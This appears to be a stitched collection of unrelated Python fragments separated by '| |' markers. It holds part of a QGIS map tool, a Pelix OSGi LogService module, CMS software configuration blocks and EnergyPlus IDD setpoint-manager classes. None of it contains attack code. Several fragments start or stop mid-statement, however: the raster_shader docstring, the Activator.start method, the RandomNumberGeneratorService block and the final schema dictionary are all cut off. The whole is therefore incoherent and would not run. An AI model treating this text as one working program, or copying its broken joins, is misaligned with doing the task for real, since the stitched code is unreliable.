self.reset()
qgis_gui.QgsMapTool.deactivate(self)
self.deactivated.emit()
def raster_shader(lyrmin: float, lyrmax: float):
"""
Use the provided minimum/maximum layer value to build a color ramp for rendering surface tifs. We don't have the
ability in Kluster to pick a color ramp, we just give them this one.
Parameters
----------
lyrmin
minimum value for | |
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Implementation of the OSGi LogService, based on Python standard logging
:author: <NAME>
:copyright: Copyright 2020, <NAME>
:license: Apache License 2.0
:version: 1.0.1
..
Copyright 2020 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import collections
import datetime
import logging
import sys
import time
import traceback
# Pelix
import pelix.framework
from pelix.constants import BundleActivator
from pelix.misc import (
LOG_SERVICE,
LOG_READER_SERVICE,
PROPERTY_LOG_LEVEL,
PROPERTY_LOG_MAX_ENTRIES,
)
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (1, 0, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# Local logger
logger = logging.getLogger(__name__)
# Definition of the log levels (OSGi values)
LOG_ERROR = 1
LOG_WARNING = 2
LOG_INFO = 3
LOG_DEBUG = 4
# OSGi level => Python logging level
OSGI_TO_LEVEL = {
LOG_DEBUG: logging.DEBUG,
LOG_INFO: logging.INFO,
LOG_WARNING: logging.WARNING,
LOG_ERROR: logging.ERROR,
}
# Python logging level => OSGi level
LEVEL_TO_OSGI = {
logging.DEBUG: LOG_DEBUG,
logging.INFO: LOG_INFO,
logging.WARNING: LOG_WARNING,
logging.ERROR: LOG_ERROR,
logging.CRITICAL: LOG_ERROR,
}
# ------------------------------------------------------------------------------
class LogEntry(object):
"""
Represents a log entry
"""
__slots__ = (
"__bundle",
"__exception",
"__level",
"__message",
"__reference",
"__time",
"__record",
)
def __init__(self, level, message, exception, bundle, reference):
"""
:param level: The Python log level of the entry
:param message: A human readable message
:param exception: The exception associated to the entry
:param bundle: The bundle that created the entry
:param reference: The service reference associated to the entry
"""
self.__bundle = bundle
self.__exception = exception
self.__level = level
self.__message = message
self.__reference = reference
self.__time = time.time()
self.__record = None
def __str__(self):
"""
String representation
"""
values = [
# 7: length of "WARNING"
"{0: ^7} ::".format(logging.getLevelName(self.__level)),
# Date
str(datetime.datetime.fromtimestamp(self.__time)),
"::",
]
if self.__bundle:
# Bundle name
values.append(
"{0: <20s} ::".format(self.__bundle.get_symbolic_name())
)
# Message
values.append(self.__message)
if not self.__exception:
# Print as is
return " ".join(values)
# Print the exception too
return "{0}\n{1}".format(" ".join(values), self.__exception)
@property
def bundle(self):
"""
The bundle that created this entry
"""
return self.__bundle
@property
def message(self):
"""
The message associated to this entry
"""
return self.__message
@property
def exception(self):
"""
The exception associated to this entry
"""
return self.__exception
@property
def level(self):
"""
The log level of this entry (Python constant)
"""
return self.__level
@property
def osgi_level(self):
"""
The log level of this entry (OSGi constant)
"""
return LEVEL_TO_OSGI.get(self.__level, LOG_INFO)
@property
def reference(self):
"""
The reference to the service associated to this entry
"""
return self.__reference
@property
def time(self):
"""
The timestamp of this entry
"""
return self.__time
def to_record(self):
# type: () -> logging.LogRecord
"""
Returns this object as a ``logging.LogRecord``
"""
if self.__record is None:
# Construct the record on demand
self.__record = self.__make_record()
return self.__record
def __make_record(self):
"""
Converts this object into a ``logging.LogRecord`` object
"""
# Extract local details
bundle = self.bundle
name = bundle.get_symbolic_name()
pathname = bundle.get_location()
lineno = 0
args = []
func = "n/a"
sinfo = None
level = self.level
msg = self.message
exc_info = self.exception
# Construct the record
record = logging.LogRecord(
name, level, pathname, lineno, msg, args, exc_info, func, sinfo
)
# Fix the time related entries
log_start_time = record.created - (record.relativeCreated / 1000)
creation_time = self.__time
record.created = creation_time
record.msecs = (creation_time - int(creation_time)) * 1000
record.relativeCreated = (creation_time - log_start_time) * 1000
return record
class LogReaderService:
"""
The LogReader service
"""
def __init__(self, context, max_entries):
"""
:param context: The bundle context
:param max_entries: Maximum stored entries
"""
self._context = context
self.__logs = collections.deque(maxlen=max_entries)
self.__listeners = set()
def add_log_listener(self, listener):
"""
Subscribes a listener to log events.
A log listener is an object providing with a ``logged`` method, with
the following signature:
.. code-block:: python
def logged(self, log_entry):
'''
A log entry (LogEntry) has been added to the log service
'''
# ...
:param listener: A new listener
"""
if listener is not None:
self.__listeners.add(listener)
def remove_log_listener(self, listener):
"""
Unsubscribes a listener from log events.
:param listener: The listener to remove
"""
self.__listeners.discard(listener)
def get_log(self):
"""
Returns the logs events kept by the service
:return: A tuple of log entries
"""
return tuple(self.__logs)
def _store_entry(self, entry):
"""
Stores a new log entry and notifies listeners
:param entry: A LogEntry object
"""
# Get the logger and log the message
self.__logs.append(entry)
# Notify listeners
for listener in self.__listeners.copy():
try:
listener.logged(entry)
except Exception as ex:
# Create a new log entry, without using logging nor notifying
# listener (to avoid a recursion)
err_entry = LogEntry(
logging.WARNING,
"Error notifying logging listener {0}: {1}".format(
listener, ex
),
sys.exc_info(),
self._context.get_bundle(),
None,
)
# Insert the new entry before the real one
self.__logs.pop()
self.__logs.append(err_entry)
self.__logs.append(entry)
class LogServiceInstance:
# pylint: disable=R0903
"""
Instance of the log service given to a bundle by the factory
"""
__slots__ = ("__reader", "__bundle")
def __init__(self, reader, bundle):
"""
:param reader: The Log Reader service
:param bundle: Bundle associated to this instance
"""
self.__reader = reader
self.__bundle = bundle
def log(self, level, message, exc_info=None, reference=None):
# pylint: disable=W0212
"""
Logs a message, possibly with an exception
:param level: Severity of the message (Python logging level)
:param message: Human readable message
:param exc_info: The exception context (sys.exc_info()), if any
:param reference: The ServiceReference associated to the log
"""
if not isinstance(reference, pelix.framework.ServiceReference):
# Ensure we have a clean Service Reference
reference = None
if exc_info is not None:
# Format the exception to avoid memory leaks
try:
exception_str = "\n".join(traceback.format_exception(*exc_info))
except (TypeError, ValueError, AttributeError):
exception_str = "<Invalid exc_info>"
else:
exception_str = None
# Store the LogEntry
entry = LogEntry(
level, message, exception_str, self.__bundle, reference
)
self.__reader._store_entry(entry)
class LogServiceFactory(logging.Handler):
"""
Log Service Factory: provides a logger per bundle
"""
def __init__(self, context, reader, level):
"""
:param context: The bundle context
:param reader: The Log Reader service
:param level: The minimal log level of this handler
"""
logging.Handler.__init__(self, level)
self._framework = context.get_framework()
self._reader = reader
def _bundle_from_module(self, module_object):
"""
Find the bundle associated to a module
:param module_object: A Python module object
:return: The Bundle object associated to the module, or None
"""
try:
# Get the module name
module_object = module_object.__name__
except AttributeError:
# We got a string
pass
return self._framework.get_bundle_by_name(module_object)
def emit(self, record):
# pylint: disable=W0212
"""
Handle a message logged with the logger
:param record: A log record
"""
# Get the bundle
bundle = self._bundle_from_module(record.module)
# Convert to a LogEntry
entry = LogEntry(
record.levelno, record.getMessage(), None, bundle, None
)
self._reader._store_entry(entry)
def get_service(self, bundle, registration):
# pylint: disable=W0613
"""
Returns an instance of the log service for the given bundle
:param bundle: Bundle consuming the service
:param registration: Service registration bean
:return: An instance of the logger
"""
return LogServiceInstance(self._reader, bundle)
@staticmethod
def unget_service(bundle, registration):
"""
Releases the service associated to the given bundle
:param bundle: Consuming bundle
:param registration: Service registration bean
"""
pass
@BundleActivator
class Activator(object):
"""
The bundle activator
"""
def __init__(self):
self.__reader_reg = None
self.__factory_reg = None
self.__factory = None
@staticmethod
def get_level(context):
"""
Get the log level from the bundle context (framework properties)
:param context: A bundle context
:return: A log level (int)
"""
# Get the log level
level_value = context.get_property(PROPERTY_LOG_LEVEL)
if level_value:
for converter in int, logging.getLevelName:
try:
parsed_level = converter(level_value)
if isinstance(parsed_level, int):
# Got a valid level
return parsed_level
except (ValueError, TypeError):
pass
# By default, use the INFO level
return logging.INFO
def start(self, context):
"""
Bundle starting
:param context: The bundle context
"""
# Get the maximum number of entries authorized
max_entries = context.get_property(PROPERTY_LOG_MAX_ENTRIES)
try:
# Normalize the value
max_entries = int(max_entries)
except (ValueError, TypeError):
max_entries = 100
# Register the LogReader service
reader = LogReaderService(context, max_entries)
self.__reader_reg = context.register_service(
LOG_READER_SERVICE, reader, {}
)
# Register the LogService factory
self.__factory = LogServiceFactory(
context, reader, self.get_level(context)
)
self.__factory_reg = | |
= cms.untracked.double(0.0)
)
VerificationCommonParameters = cms.PSet(
MCTruthCollection = cms.InputTag("generatorSmeared"),
verboseDBE = cms.untracked.bool(False)
)
apd_sim_parameters = cms.PSet(
apdAddToBarrel = cms.bool(False),
apdDigiTag = cms.string('APD'),
apdDoPEStats = cms.bool(True),
apdNonlParms = cms.vdouble(
1.48, -3.75, 1.81, 1.26, 2.0,
45, 1.0
),
apdSeparateDigi = cms.bool(True),
apdShapeTau = cms.double(40.5),
apdShapeTstart = cms.double(74.5),
apdSimToPEHigh = cms.double(88200000.0),
apdSimToPELow = cms.double(2450000.0),
apdTimeOffWidth = cms.double(0.8),
apdTimeOffset = cms.double(-13.5)
)
MTVHistoProducerAlgoForTrackerBlock = cms.PSet(
GpSelectorForEfficiencyVsEta = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(30.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.9),
status = cms.int32(1),
tip = cms.double(3.5)
),
GpSelectorForEfficiencyVsPhi = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(30.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.9),
status = cms.int32(1),
tip = cms.double(3.5)
),
GpSelectorForEfficiencyVsPt = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(30.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.05),
status = cms.int32(1),
tip = cms.double(3.5)
),
GpSelectorForEfficiencyVsVTXR = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(30.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.9),
status = cms.int32(1),
tip = cms.double(30.0)
),
GpSelectorForEfficiencyVsVTXZ = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(35.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.9),
status = cms.int32(1),
tip = cms.double(3.5)
),
TpSelectorForEfficiencyVsEta = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(4.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-4.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.9),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(3.5)
),
TpSelectorForEfficiencyVsPhi = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(2.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.9),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(3.5)
),
TpSelectorForEfficiencyVsPt = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(2.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.05),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(3.5)
),
TpSelectorForEfficiencyVsVTXR = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(2.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.9),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(60.0)
),
TpSelectorForEfficiencyVsVTXZ = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(2.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.9),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(3.5)
),
cotThetaRes_nbin = cms.int32(300),
cotThetaRes_rangeMax = cms.double(0.02),
cotThetaRes_rangeMin = cms.double(-0.02),
dxyDzZoom = cms.double(25),
dxyRes_nbin = cms.int32(500),
dxyRes_rangeMax = cms.double(0.1),
dxyRes_rangeMin = cms.double(-0.1),
dzRes_nbin = cms.int32(150),
dzRes_rangeMax = cms.double(0.05),
dzRes_rangeMin = cms.double(-0.05),
generalGpSelector = cms.PSet(
chargedOnly = cms.bool(True),
lip = cms.double(30.0),
maxRapidity = cms.double(2.5),
minRapidity = cms.double(-2.5),
pdgId = cms.vint32(),
ptMin = cms.double(0.9),
status = cms.int32(1),
tip = cms.double(3.5)
),
generalTpSelector = cms.PSet(
chargedOnly = cms.bool(True),
intimeOnly = cms.bool(False),
lip = cms.double(30.0),
maxPhi = cms.double(3.2),
maxRapidity = cms.double(4.5),
minHit = cms.int32(0),
minPhi = cms.double(-3.2),
minRapidity = cms.double(-4.5),
pdgId = cms.vint32(),
ptMax = cms.double(1e+100),
ptMin = cms.double(0.9),
signalOnly = cms.bool(True),
stableOnly = cms.bool(False),
tip = cms.double(3.5)
),
maxChi2 = cms.double(20),
maxDeDx = cms.double(10.0),
maxDxy = cms.double(25),
maxDz = cms.double(30),
maxDzpvCumulative = cms.double(0.6),
maxDzpvsigCumulative = cms.double(10),
maxEta = cms.double(4.5),
maxHit = cms.double(80.5),
maxLayers = cms.double(25.5),
maxMVA = cms.double(1),
maxPVz = cms.double(60),
maxPhi = cms.double(3.1416),
maxPt = cms.double(1000),
maxPu = cms.double(259.5),
maxTracks = cms.double(2000),
maxVertcount = cms.double(160.5),
maxVertpos = cms.double(100),
maxZpos = cms.double(30),
maxdr = cms.double(1),
minChi2 = cms.double(0),
minDeDx = cms.double(0.0),
minDxy = cms.double(-25),
minDz = cms.double(-30),
minEta = cms.double(-4.5),
minHit = cms.double(-0.5),
minLayers = cms.double(-0.5),
minMVA = cms.double(-1),
minPVz = cms.double(-60),
minPhi = cms.double(-3.1416),
minPt = cms.double(0.1),
minPu = cms.double(-0.5),
minTracks = cms.double(0),
minVertcount = cms.double(-0.5),
minVertpos = cms.double(0.01),
minZpos = cms.double(-30),
mindr = cms.double(0.001),
nintChi2 = cms.int32(40),
nintDeDx = cms.int32(40),
nintDxy = cms.int32(100),
nintDz = cms.int32(60),
nintDzpvCumulative = cms.int32(240),
nintDzpvsigCumulative = cms.int32(200),
nintEta = cms.int32(90),
nintHit = cms.int32(81),
nintLayers = cms.int32(26),
nintMVA = cms.int32(100),
nintPVz = cms.int32(120),
nintPhi = cms.int32(36),
nintPt = cms.int32(40),
nintPu = cms.int32(130),
nintTracks = cms.int32(200),
nintVertcount = cms.int32(161),
nintVertpos = cms.int32(40),
nintZpos = cms.int32(60),
nintdr = cms.int32(100),
phiRes_nbin = cms.int32(300),
phiRes_rangeMax = cms.double(0.01),
phiRes_rangeMin = cms.double(-0.01),
ptRes_nbin = cms.int32(100),
ptRes_rangeMax = cms.double(0.1),
ptRes_rangeMin = cms.double(-0.1),
seedingLayerSets = cms.vstring(),
useFabsEta = cms.bool(False),
useInvPt = cms.bool(False),
useLogPt = cms.untracked.bool(True),
useLogVertpos = cms.untracked.bool(True)
)
lumiProducer = cms.EDProducer("LumiProducer",
connect = cms.string('frontier://LumiProd/CMS_LUMI_PROD'),
lumiversion = cms.untracked.string(''),
ncacheEntries = cms.untracked.uint32(5)
)
SiStripClusterChargeCutLoose = cms.PSet(
value = cms.double(1620.0)
)
SiStripClusterChargeCutNone = cms.PSet(
value = cms.double(-1.0)
)
SiStripClusterChargeCutTight = cms.PSet(
value = cms.double(1945.0)
)
SiStripClusterChargeCutTiny = cms.PSet(
value = cms.double(800.0)
)
dqmCSCClient = cms.EDProducer("CSCMonitorModule",
BOOKING_XML_FILE = cms.FileInPath('DQM/CSCMonitorModule/data/emuDQMBooking.xml'),
EventProcessor = cms.untracked.PSet(
BINCHECKER_CRC_ALCT = cms.untracked.bool(True),
BINCHECKER_CRC_CFEB = cms.untracked.bool(True),
BINCHECKER_CRC_CLCT = cms.untracked.bool(True),
BINCHECKER_MODE_DDU = cms.untracked.bool(False),
BINCHECKER_OUTPUT = cms.untracked.bool(False),
BINCHECK_MASK = cms.untracked.uint32(384563190),
DDU_BINCHECK_MASK = cms.untracked.uint32(384563190),
DDU_CHECK_MASK = cms.untracked.uint32(4294959103),
EFF_COLD_SIGFAIL = cms.untracked.double(2.0),
EFF_COLD_THRESHOLD = cms.untracked.double(0.1),
EFF_ERR_SIGFAIL = cms.untracked.double(5.0),
EFF_ERR_THRESHOLD = cms.untracked.double(0.1),
EFF_HOT_SIGFAIL = cms.untracked.double(5.0),
EFF_HOT_THRESHOLD = cms.untracked.double(2.0),
EFF_NODATA_SIGFAIL = cms.untracked.double(5.0),
EFF_NODATA_THRESHOLD = cms.untracked.double(0.99),
EVENTS_ECHO = cms.untracked.uint32(1000),
FOLDER_CSC = cms.untracked.string('CSC/CSC/'),
FOLDER_DDU = cms.untracked.string('CSC/DDU/'),
FOLDER_EMU = cms.untracked.string('CSC/Summary/'),
FOLDER_FED = cms.untracked.string('CSC/FED/'),
FOLDER_PAR = cms.untracked.string('CSC/EventInfo/reportSummaryContents/'),
FRAEFF_AUTO_UPDATE = cms.untracked.bool(False),
FRAEFF_AUTO_UPDATE_FREQ = cms.untracked.uint32(200),
FRAEFF_AUTO_UPDATE_START = cms.untracked.uint32(5),
FRAEFF_SEPARATE_THREAD = cms.untracked.bool(False),
MO_FILTER = cms.untracked.vstring(
'+/^.*$/',
'-/All_Readout_Errors/',
'-/^DMB_.*$/',
'-/DDU_[0-9]+/',
'-/CSC_[0-9]+_[0-9]+/'
),
PROCESS_CSC = cms.untracked.bool(True),
PROCESS_DDU = cms.untracked.bool(True),
PROCESS_EFF_HISTOS = cms.untracked.bool(False),
PROCESS_EFF_PARAMETERS = cms.untracked.bool(False)
),
InputObjects = cms.untracked.InputTag("rawDataCollector"),
PREBOOK_EFF_PARAMS = cms.untracked.bool(False)
)
###### cms.Services
DBService = cms.Service("DBService")
DQMStore = cms.Service("DQMStore")
FastTimerService = cms.Service("FastTimerService",
dqmLumiSectionsRange = cms.untracked.uint32(2500),
dqmMemoryRange = cms.untracked.double(1000000),
dqmMemoryResolution = cms.untracked.double(5000),
dqmModuleMemoryRange = cms.untracked.double(100000),
dqmModuleMemoryResolution = cms.untracked.double(500),
dqmModuleTimeRange = cms.untracked.double(100.0),
dqmModuleTimeResolution = cms.untracked.double(0.5),
dqmPath = cms.untracked.string('DQM/TimerService'),
dqmPathMemoryRange = cms.untracked.double(1000000),
dqmPathMemoryResolution = cms.untracked.double(5000),
dqmPathTimeRange = cms.untracked.double(10000.0),
dqmPathTimeResolution = cms.untracked.double(10.0),
dqmTimeRange = cms.untracked.double(10000.0),
dqmTimeResolution = cms.untracked.double(10.0),
enableDQM = cms.untracked.bool(True),
enableDQMTransitions = cms.untracked.bool(False),
enableDQMbyLumiSection = cms.untracked.bool(True),
enableDQMbyModule = cms.untracked.bool(False),
enableDQMbyPath = cms.untracked.bool(False),
enableDQMbyProcesses = cms.untracked.bool(False),
highlightModules = cms.untracked.VPSet(),
printEventSummary = cms.untracked.bool(False),
printJobSummary = cms.untracked.bool(True),
printRunSummary = cms.untracked.bool(False)
)
RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
CTPPSFastRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1357987)
),
LHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
MuonSimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(987346)
),
VtxSmeared = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(98765432)
),
ecalPreshowerRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6541321)
),
ecalRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(654321)
),
externalLHEProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(234567)
),
famosPileUp = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
fastSimProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(13579)
),
fastTrackerRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(24680)
),
g4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
generator = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hbhereco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hfreco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hiSignal = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hiSignalG4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
hiSignalLHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(88776655)
),
horeco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
l1ParamMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6453209)
),
mix = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixData = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixGenPU = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixRecoTracks = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixSimCaloHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
paramMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(54525)
),
restoreStateLabel = cms.untracked.string('randomEngineStateProducer'),
saveFileName = cms.untracked.string(''),
simBeamSpotFilter = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
simMuonCSCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11223344)
),
simMuonDTDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonGEMDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0Digis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0PseudoDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonME0PseudoReDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
| |
`control_zone_air_node_name` or None if not set
"""
return self["Control Zone Air Node Name"]
@control_zone_air_node_name.setter
def control_zone_air_node_name(self, value=None):
"""Corresponds to IDD field `Control Zone Air Node Name`"""
self["Control Zone Air Node Name"] = value
class SetpointManagerMixedAir(DataObject):
""" Corresponds to IDD object `SetpointManager:MixedAir`
The Mixed Air Setpoint Manager is meant to be used in conjunction
with a Controller:OutdoorAir object. This setpoint manager is used
to establish a temperature setpoint at the mixed air node.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'default': u'Temperature',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature'],
'autocalculatable': False,
'type': 'alpha'}),
(u'reference setpoint node name',
{'name': u'Reference Setpoint Node Name',
'pyname': u'reference_setpoint_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'fan inlet node name',
{'name': u'Fan Inlet Node Name',
'pyname': u'fan_inlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'fan outlet node name',
{'name': u'Fan Outlet Node Name',
'pyname': u'fan_outlet_node_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'}),
(u'setpoint node or nodelist name',
{'name': u'Setpoint Node or NodeList Name',
'pyname': u'setpoint_node_or_nodelist_name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'node'})]),
'format': None,
'group': u'Setpoint Managers',
'min-fields': 0,
'name': u'SetpointManager:MixedAir',
'pyname': u'SetpointManagerMixedAir',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def control_variable(self):
"""field `Control Variable`
| Default value: Temperature
Args:
value (str): value for IDD Field `Control Variable`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `control_variable` or None if not set
"""
return self["Control Variable"]
@control_variable.setter
def control_variable(self, value="Temperature"):
"""Corresponds to IDD field `Control Variable`"""
self["Control Variable"] = value
@property
def reference_setpoint_node_name(self):
"""field `Reference Setpoint Node Name`
Args:
value (str): value for IDD Field `Reference Setpoint Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `reference_setpoint_node_name` or None if not set
"""
return self["Reference Setpoint Node Name"]
@reference_setpoint_node_name.setter
def reference_setpoint_node_name(self, value=None):
"""Corresponds to IDD field `Reference Setpoint Node Name`"""
self["Reference Setpoint Node Name"] = value
@property
def fan_inlet_node_name(self):
"""field `Fan Inlet Node Name`
Args:
value (str): value for IDD Field `Fan Inlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_inlet_node_name` or None if not set
"""
return self["Fan Inlet Node Name"]
@fan_inlet_node_name.setter
def fan_inlet_node_name(self, value=None):
"""Corresponds to IDD field `Fan Inlet Node Name`"""
self["Fan Inlet Node Name"] = value
@property
def fan_outlet_node_name(self):
"""field `Fan Outlet Node Name`
Args:
value (str): value for IDD Field `Fan Outlet Node Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `fan_outlet_node_name` or None if not set
"""
return self["Fan Outlet Node Name"]
@fan_outlet_node_name.setter
def fan_outlet_node_name(self, value=None):
"""Corresponds to IDD field `Fan Outlet Node Name`"""
self["Fan Outlet Node Name"] = value
@property
def setpoint_node_or_nodelist_name(self):
"""field `Setpoint Node or NodeList Name`
| Node(s) at which the temperature will be set
Args:
value (str): value for IDD Field `Setpoint Node or NodeList Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `setpoint_node_or_nodelist_name` or None if not set
"""
return self["Setpoint Node or NodeList Name"]
@setpoint_node_or_nodelist_name.setter
def setpoint_node_or_nodelist_name(self, value=None):
"""Corresponds to IDD field `Setpoint Node or NodeList Name`"""
self["Setpoint Node or NodeList Name"] = value
class SetpointManagerOutdoorAirPretreat(DataObject):
""" Corresponds to IDD object `SetpointManager:OutdoorAirPretreat`
This setpoint manager determines the required
conditions at the outdoor air stream node which will
produce the reference setpoint condition at the
mixed air node when mixed with the return air stream
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'control variable',
{'name': u'Control Variable',
'pyname': u'control_variable',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Temperature',
u'HumidityRatio',
u'MaximumHumidityRatio',
u'MinimumHumidityRatio'],
'autocalculatable': False,
'type': 'alpha'}),
(u'minimum setpoint temperature',
{'name': u'Minimum Setpoint Temperature',
'pyname': u'minimum_setpoint_temperature',
'default': -99.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'C'}),
(u'maximum setpoint temperature',
{'name': u'Maximum Setpoint Temperature',
